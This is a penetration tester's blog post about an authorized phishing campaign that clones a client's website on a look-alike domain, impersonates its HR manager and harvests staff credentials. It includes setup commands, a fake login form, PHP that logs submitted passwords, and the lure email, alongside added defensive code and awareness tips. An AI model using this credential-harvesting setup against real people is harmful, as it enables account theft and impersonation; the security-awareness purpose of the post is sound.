Let’s Go Phishing

Gr@ve_Rose
12 min read · Feb 19, 2021

One request we get from clients often enough is a phishing campaign request to test their users on this form of Social Engineering. You almost certainly know what a phishing attack is and in this story, I’m going to outline how one of mine was conducted. At the end, I’ll draw up tips on how to keep yourself and your employees safe. I hope you enjoy…

All of the names (people, company and domains) are fake but the scenario is real. Everything I’ve written has, at some point, happened with me personally during an engagement.

The meeting began like most other meetings I’ve been in with this specific customer… Checking in on one another during pandemic times, cracking a few jokes but eventually getting down to business. They wanted to run a phishing campaign against a group of their employees and, since we’ve done a lot of business together already, they came to us as their trusted partner.

“How deep do you want us to go?”, I asked. “Do you want to know who clicked the link or have us steal credentials? Or did you have something else in mind? If you want, we can upgrade this engagement to a Red Team exercise and start owning people.” I finished with a slight laugh.

The main tech person we were dealing with, Sam, replied. “If we can get who clicked the link and steal credentials, that would be good for now. We can always look at a Red Team engagement later on in the year.”

Typing my notes, I continued. “Sure thing. Have you thought about what you want for pretext? We’ve had a lot of success with COVID-19 screening forms. Would that work?”

“We have an app on the users’ phones which does this for us already.”, Sam let on.

“Why not just pretend you’re trying something new? We’ll set up a domain like yours, clone your website and add in a COVID-19 screening form. We can track who clicks the link and then steal credentials when people put them in.”, I offered. There was a brief pause as Sam thought it over before saying:

“That sounds plausible. Can you pretend to be our HR manager, Martin?”, he asked. Although he couldn’t see the smile on my face, I let him know that we could.

“Just to recap, we’re going to spoof your domain, pretend to be Martin and grab creds for a few days?”, I asked.

“You got it.”, Sam confirmed.

I started by looking at their domain name “acme.lab” and thinking of a domain name that may quickly trick the eye of people looking at it. Although this sounds like a noob-level hack, the psychology backs it up. If someone sees “acme” all day long, their brain will eventually look at the first and last letters of the word — If the rest of the letters in the middle are there, regardless of their position, the brain often fills it in. I went to do some domain dorking and came up with the idea of “acrne.lab” as my fake domain. The “r” and “n” characters beside each other in a plain font can look like the letter “m”. I logged into my domain purchasing account and bought the domain. Once it was purchased, I made sure to use the registrar’s function to hide my details and enable the free mail service they offered. One thing I detest doing is configuring a mail server.
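The “rn” for “m” substitution is the kind of thing a mail gateway or SOC can check mechanically before a human ever has to squint at the sender. The following is an added example, not code from the original post: it collapses a handful of visually confusable character sequences to a canonical form and compares the sender’s registrable domain against the protected one, so “acrne.lab”, “c19.acrne.lab” and a swapped TLD like “acrne.com” all come back as look-alikes. The confusable table, the two-label domain split and the sample addresses are assumptions made for this example.

```python
# Added example (not code from the original post): a mail-gateway style check
# that flags sender domains visually confusable with a protected domain, the
# "acrne.lab" vs "acme.lab" trick described above. The confusable pairs are a
# small hand-picked set (an assumption for this example), not a complete table.

# Multi-character sequences are collapsed first so "rn" becomes "m" before the
# single-character substitutions run.
_MULTI_CONFUSABLES = (("rn", "m"), ("vv", "w"), ("cl", "d"))
_SINGLE_CONFUSABLES = str.maketrans({"0": "o", "1": "l", "i": "l", "5": "s"})


def canonical(label: str) -> str:
    """Collapse a DNS label to a form in which look-alikes compare equal."""
    s = label.lower()
    for seq, rep in _MULTI_CONFUSABLES:
        s = s.replace(seq, rep)
    return s.translate(_SINGLE_CONFUSABLES)


def split_registrable(domain: str) -> tuple[str, str]:
    """Return (second-level label, TLD). Naive two-label split; production code
    should consult the public suffix list so that "co.uk" style suffixes work."""
    parts = domain.lower().rstrip(".").split(".")
    if len(parts) < 2:
        return parts[0], ""
    return parts[-2], parts[-1]


def lookalike_verdict(sender_domain: str, protected_domain: str) -> str:
    """'internal' for the protected domain or its subdomains, 'lookalike' when
    the sender's registrable name only looks like it (a swapped TLD counts),
    'external' otherwise."""
    sld, tld = split_registrable(sender_domain)
    psld, ptld = split_registrable(protected_domain)
    if (sld, tld) == (psld, ptld):
        return "internal"
    if canonical(sld) == canonical(psld):
        return "lookalike"
    return "external"


def triage_senders(addresses, protected_domain):
    """Map each sender address to its verdict; run this over a batch of From: values."""
    return {a: lookalike_verdict(a.rsplit("@", 1)[-1], protected_domain) for a in addresses}


if __name__ == "__main__":
    # Constructed sample senders, not data from the engagement.
    sample = ["martin@acme.lab", "martin@acrne.lab", "hr@c19.acrne.lab",
              "martin@acrne.com", "newsletter@example.com"]
    for addr, verdict in triage_senders(sample, "acme.lab").items():
        print(f"{addr:28} {verdict}")
```

A “lookalike” verdict is a good candidate for a quarantine rule or at least a prominent banner; it is cheaper than registering every confusable permutation yourself, and it also catches the subdomain trick used for the landing page.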

Now that I had the domain, I put the workflow together on my whiteboard. To start with, I needed to clone their website. No problem there. Next would be to create a landing area for people who clicked on the link and how to track that first portion. I figured adding a hash in the URL that I could link to the user’s e-mail address would work nicely for that. Last would be capturing username and password information. Again, easy-peasy with a PHP back-end on the web server. I got myself another cup of coffee and started off to work.

Logging into my cloud provider, I spun up an Ubuntu Server machine making sure it had IPv4 and IPv6 access and limited SSH to my static IP addresses on both stacks. I uploaded my SSH key and was off to the races. The first task was to clone their website. To do this, I’d need a web server to host it. I’m most familiar with Apache so running “apt install apache2 php libapache2-mod-php” took care of that for me. I created a custom directory for the site with “mkdir -p /var/www/acrne/acrne.lab” which would be the base for the main site. Going into that directory, I used “wget” to clone the entire website into this directory and changed all HREF tags from “acme.lab” to “acrne.lab” by running “sed -i -e 's/acme.lab/acrne.lab/g' ./*.html” which took care of that. Now, any link clicks on “acrne.lab” would stay on my domain. Lastly, permissions are a big part of security so I changed the ownership to the Ubuntu web server process with “chown www-data.www-data -R /var/www/” and all was set.

You may be wondering why I didn’t post the full “wget” command. Medium performs automatic formatting and putting in CLI switches gets messed up. If you search “wget clone website” there are a lot of articles out there.

I opened up my browser and loaded “hxxp://acrne.lab” which showed me an exact replica of the “acme.lab” website. In my DNS entries with my registrar, I created a new subdomain for “c19.acrne.lab” which would house my landing page. Opening up my shell, I created a new “sites-available” configuration for “c19.acrne.lab” and pointed the “DocumentRoot” to “/var/www/acrne/c19.acrne.lab/”. I copied the entire website into this directory as well, opened the subdomain in my browser and used the “Inspect Element” option to study the layout of the page. By viewing the page this way and having “vim” open in a terminal, I was able to remove the original content and add my own in the middle of a “<div>” tag. Here’s where I created the trap.

After removing superfluous content, I created a small blurb about how Acme Lab requires users to sign in and fill out the C19 questionnaire. I created a login form with the following DOM elements:

  • <form action="survey.php" method="post">
  • <input type="text" name="username">
  • <input type="password" name="password">

This code ensures that the POST elements from the form will be sent to the “survey.php” page once the user submits the form. I finished up my coffee and started to work on the next portion.

I copied the “index.html” page as “survey.php” and removed the login form I built. The first thing I needed to do was capture what was sent in the login form. I added the following lines at the top of the page:

<?php
// Append a timestamp and the two submitted form fields to the loot file
$myfile = fopen("/var/log/phishing/loot/acme/loot.txt", "a");
fwrite($myfile, "\n\n" . '[ ' . date('d.m.Y') . " ] — [ " . date('Hi') . "hrs ]\n" . $_POST['username'] . " — " . $_POST['password']);
fclose($myfile);
?>

This would save any information from the previous form to my loot file. Of course, I needed to create the loot file and permissions so I saved and exited back to my shell. Running “mkdir -p /var/log/phishing/loot/acme/ && touch /var/log/phishing/loot/acme/loot.txt” created both the directories and the loot file in one fell swoop. Of course, we had to set permissions as well with “chown www-data.www-data -R /var/log/loot” otherwise the web server wouldn’t be able to put information in the loot file.

“Why not just put the loot file in the web directory?”, you ask.
This loot file will contain usernames and passwords for actual users of a company. We don’t want anyone else to get a hold of that information. That would be bad.

Lastly, I created the actual COVID-19 questionnaire with typical questions like “Have you been outside of the country in the past two weeks?” and some “Yes/No” radio buttons. Since personal information such as this is covered under PIPEDA, the action page for the form didn’t actually save anything regarding a person’s COVID-19 medical status. It just presented them with a thank-you page and redirected them back to “acme.lab” after ten seconds.

Finishing off the last of my cup of coffee, I had to take it out for a spin. The first thing was to run “tail -f /var/log/phishing/acme/loot.txt” while I filled in the form on the “index.html” page. Sure enough, once I submitted the form, anything in the two fields was saved to my loot file. I stopped tailing the loot file and started tailing the “/var/log/apache2/access.log” file and put a new URL in the location bar: “hxxp://c19.acrne.lab/index.html?12345” and hit the [Enter] key to load it. The page loaded properly and the full URL showed up in the log file. “Perfect.”, I whispered to myself.

One last item remained for the website and that was proper HTTPS configuration. Thankfully the Certbot from Let’s Encrypt makes this chore a piece of cake. Now my two domains have a valid TLS certificate and will automatically redirect insecure requests to the TLS site. I went to get myself another coffee.

Sitting back down at my desk, I looked at the e-mail signature for Martin which Sam had provided for me. Using a web-based e-mail solution allowed me to use the “Inspect Element” feature of his signature and I copied the CSS into a text editor. I then crafted the e-mail template I would use with the script I wrote for phishing campaigns such as this.

Hello $NAME,
We’re trying a new format of COVID-19 screening and reporting. Please fill out the form <a href="hxxps://c19.acrne.com/index.html?$HASH">here</a> and log in with your corporate username and password. You only have to do this once and we will be collecting feedback after the experience.
Thank-you,
Martin
<!-- CSS inline goes here -->
123 Candycane Ln.
North Pole, H0H 0H0
E-mail: <a href="mailto:martin@acrne.lab">martin@acme.lab</a>

I always make sure that the “mailto” HREF uses obfuscation so in the event a target doesn’t use the “Reply” feature of their e-mail client and instead uses the e-mail link in the signature, it will come to me. I don’t know if it’s ever happened but if it does, I’ll be ready.
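The template above exposes two things a mail gateway or a SOC analyst triaging a reported message can test without any judgement call: an external sender address carrying the display name of a real employee, and a link whose visible text (“martin@acme.lab”) does not match where the href actually goes (“mailto:martin@acrne.lab”). The following is an added example, not code from the original post; the sample message, the ORG_DOMAIN value and the one-entry DIRECTORY stand-in for an employee directory are constructed for this example.

```python
# Added example (not code from the original post): two checks a mail gateway or
# a SOC analyst can run on a reported message. The sample message, the ORG_DOMAIN
# value and the DIRECTORY stand-in are constructed for this example.
import re
from email import message_from_string, policy
from email.utils import parseaddr
from html.parser import HTMLParser

ORG_DOMAIN = "acme.lab"                      # the protected domain from the post
DIRECTORY = {"martin": "martin@acme.lab"}    # constructed stand-in for an employee directory


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def _host(text: str) -> str:
    """Host part of a URL or bare domain ("acme.lab/c19" -> "acme.lab")."""
    m = re.match(r"(?:[a-z][a-z0-9+.-]*://)?([^/?#:\s]+)", text, re.I)
    return m.group(1).lower() if m else ""


def mismatched_links(html: str):
    """Return (visible text, href) pairs where the text shows one address or
    host but the link goes somewhere else, e.g. the mailto in the signature."""
    collector = _LinkCollector()
    collector.feed(html)
    found = []
    for href, text in collector.links:
        if href.lower().startswith("mailto:"):
            target = href[len("mailto:"):].split("?", 1)[0].lower()
            if "@" in text and text.lower() != target:
                found.append((text, href))
        elif "." in text and " " not in text:
            # Text that looks like a URL or domain must point at the same host.
            if _host(text) != _host(href):
                found.append((text, href))
    return found


def sender_findings(raw_message: str):
    """Findings for one RFC 5322 message: external sender, an internal
    employee's display name on an external address, and link/text mismatches."""
    msg = message_from_string(raw_message, policy=policy.default)
    name, addr = parseaddr(str(msg["From"]))
    domain = addr.rsplit("@", 1)[-1].lower()
    findings = []
    if domain != ORG_DOMAIN and not domain.endswith("." + ORG_DOMAIN):
        findings.append("external-sender")
        first = name.split()[0].lower() if name else ""
        known = DIRECTORY.get(first)
        if known and known.rsplit("@", 1)[-1] != domain:
            findings.append("display-name-impersonation")
    body = msg.get_body(preferencelist=("html",))
    if body is not None and mismatched_links(body.get_content()):
        findings.append("link-text-mismatch")
    return findings


# Constructed sample modelled on the template above; not a captured message.
SAMPLE_MESSAGE = """\
From: Martin <martin@acrne.lab>
To: alex@acme.lab
Subject: New COVID-19 screening form
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<p>Hello Alex,</p>
<p>Please fill out the form <a href="https://c19.acrne.lab/index.html?TOKEN">here</a>.</p>
<p>E-mail: <a href="mailto:martin@acrne.lab">martin@acme.lab</a></p>
"""

if __name__ == "__main__":
    print(sender_findings(SAMPLE_MESSAGE))
```

Each finding on its own is only a signal; the combination of an external sender, a display name that belongs to someone in the directory and a mismatched mailto is exactly the pattern the “external sender” banner is meant to make a reader stop and question, and a gateway rule can quarantine on it before the banner is ever needed.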

Making my way through my coffee, I log into the webmail provided by my registrar and update my account settings so that I’m using Martin’s full name and the same signature I’ve used in my template. I send a few test e-mails to myself and reply to them to ensure that they look as close as possible to being legitimate. All’s well on this front. One last piece to test.

In “vim” I create the CSV I’m going to use by putting my own information in there including my name and e-mail address. The script I have created will take the e-mail address and run it through SHA-256 and append that to the URL being sent to the user. This is the “$HASH” variable used in the e-mail template. With the hash in place and showing up in the “access.log” file, I can see who clicked on the link even if they don’t put in their usernames and passwords. Of course there is the possibility that a target sends it to the helpdesk for investigation but the point still stands. I load the CSV into my script and give it a test… A few seconds later, I receive the e-mail and it looks perfect. I finish up my coffee and call it a day.

Friday morning arrives and it’s time to go phishing. I send an e-mail to Sam and let him know that the campaign will launch at ten o’clock unless he stops it. He replies with two words: “Happy hunting!”

Five minutes to ten and I’ve got two terminals open tailing the loot file and the Apache logs. My web browser has my webmail open and I’ve got one terminal loaded up with my custom script just waiting for me to hit the [Enter] key. Ten o’clock rolls around and mission control has cleared us for launch. My stomach is always in knots at this point. In my head, my mind races with thoughts of doubt and insecurity. “What if I’ve missed something? What if they see right through it? What if I screwed up a line in my script?”

With social engineering, it’s live. You only get one shot. If it goes awry, you can’t e-mail the target and ask them to hold tight while you fix something and phish them again. It’s thirty seconds in and I’m already thinking that I should’ve spiked my coffee to calm myself.

But then… It happens. A new line shows up in the “access.log” file. Is it an automated scan? I look at the requested URI and it has a hash at the end of it. This is legit. Someone clicked the link. How far will they go? My eyes are fixated on the terminal tailing the loot file. The cursor blinking in the darkness staring back at me with its sole purpose of displaying characters. Its unending blink. It feels like eternity. But unlike eternity, this silence is broken with the listing of a username and password. They did it. They put in their credentials. My heart is racing as I fist-pump the air; nobody’s around to see it but I don’t care. I feel like Janine Melnitz from Ghostbusters yelling out “We got one!” and hitting the buzzer. But that would be too soon as another line shows up in the Apache log file and a few moments later, another in the loot file.

As much as I am fixated on these two terminals, I know that this is still just the start of the battle and I look at my webmail tab. One new message. Someone replied. A target. Did they catch on? Only one way to find out. I click on the e-mail…

> Hey Martin. Why do we need to do this if we have the app on our phone? This just seems like extra work.
< Hi. We’re just trying this for now. Go back to using your phone and thanks for the feedback.

I hit the [Send] button in the hopes it appeases them and turn my attention back to the two terminals. One more in the loot file. Things are looking good however there’s another reply waiting for me in my webmail.

> What do I use to log in?
< Your computer username and password.

A few seconds later and I see them pop up in the loot file. Things go quiet and I figure now would be a good time to refill my coffee. When I come back to my workstation, there’s yet another e-mail waiting for me.

> I filled it out but did you know our mail server thinks you’re coming from outside our organization? Do you know why that is?
< Thanks for filling it out. I’m not sure why but it started this morning. I’ve opened a ticket with the helpdesk.

My mouth is agape in absolute disbelief… The person saw the header in their e-mail saying that the e-mail being sent was from outside yet they still filled out the form and gave me their credentials. Not only that, instead of phoning or checking in with the real Martin, they used the “Reply” feature so it went back to me. Fantastic!

The rest of the day yields a 63% success rate which is three percent above my average.

“Hey Sam. How was your weekend?”, I ask on the call on Monday.

“Good. How about you?”, he asks back.

“Uneventful, which is nice.”, I say with a chuckle at the end. “Friday was a great day to go phishing, though. We nabbed sixty-three percent of the list you gave us. I’ll send out the report later this week but did you have any feedback on your side?” It’s always good to know what the other thirty-seven percent did — Did they ignore it? Did they check with the helpdesk?

“We had two people bring it to the attention of the helpdesk and that was it.”, he says in a matter-of-fact tone.

“Did you let anyone in on the test?”

“One person, yeah. We had to as he was sending you confidential documents thinking you were the real Martin and wondering why you weren’t replying.”, he laughs.

“Oh. Let me check my webmail…”, I trail off as I load up the webmail application. Sure enough, there are two e-mails of an official nature sitting in my inbox. “I’ll delete those right now.” I ensure that the e-mails are deleted and confirm it with him.

“Good, thanks.”, he says. “We’ll get you in to do the Security Awareness training for us soon and you can discuss this in general. ‘Til then.”

And with that, another successful phishing campaign came to a close.

Some people will look at this and say that the attack methodology is very basic and the retort to that is: You’re right.

However, there’s a lot of preparation that goes into a phishing attack. You need to understand some human psychology, how the mind works and how to deflect suspicions away from yourself. You need to have the technological aspect as well for creating the landing site (be it a website or phone number or whatever) and being able to launch the attack in an expeditious manner; launch a phishing attack that takes five hours to reach twenty people and they’ll catch on quickly. A phishing attack focuses on the low-hanging fruit but a threat actor will use these targets to their advantage.

Should this have been a Red Team exercise, I would have had quite a lot of usernames and passwords. I’d give a few to my colleague to set up a distraction for the Blue Team (such as VPN logins followed by port scans) and the rest to compromise different account points of entry (e-mail, VPNs in a few days, remote desktop and remote IaaS connection points). Even if the accounts are reset quickly by the Blue Team, password reuse is another security vulnerability that people succumb to. I’ve seen it and I’ve abused it on engagements — As much as we don’t want it to happen, it does.

Stay safe out there. Phishing can come in via e-mail, SMS, instant message or any other form of communication.

  • If it seems suspicious or out of the ordinary, it probably is
  • Send it to your helpdesk or SOC to examine
  • Never reply to an e-mail or click on links if the e-mail seems suspicious
  • Always pay attention to the header on the e-mail that says it was sent from outside your organization
  • Verify in person or on the phone with the supposed original sender of the message

Gr@ve_Rose

CSO, Security Engineer, RedTeamer, PenTester, Creator of https://tcpdump101.com, Packet Monkey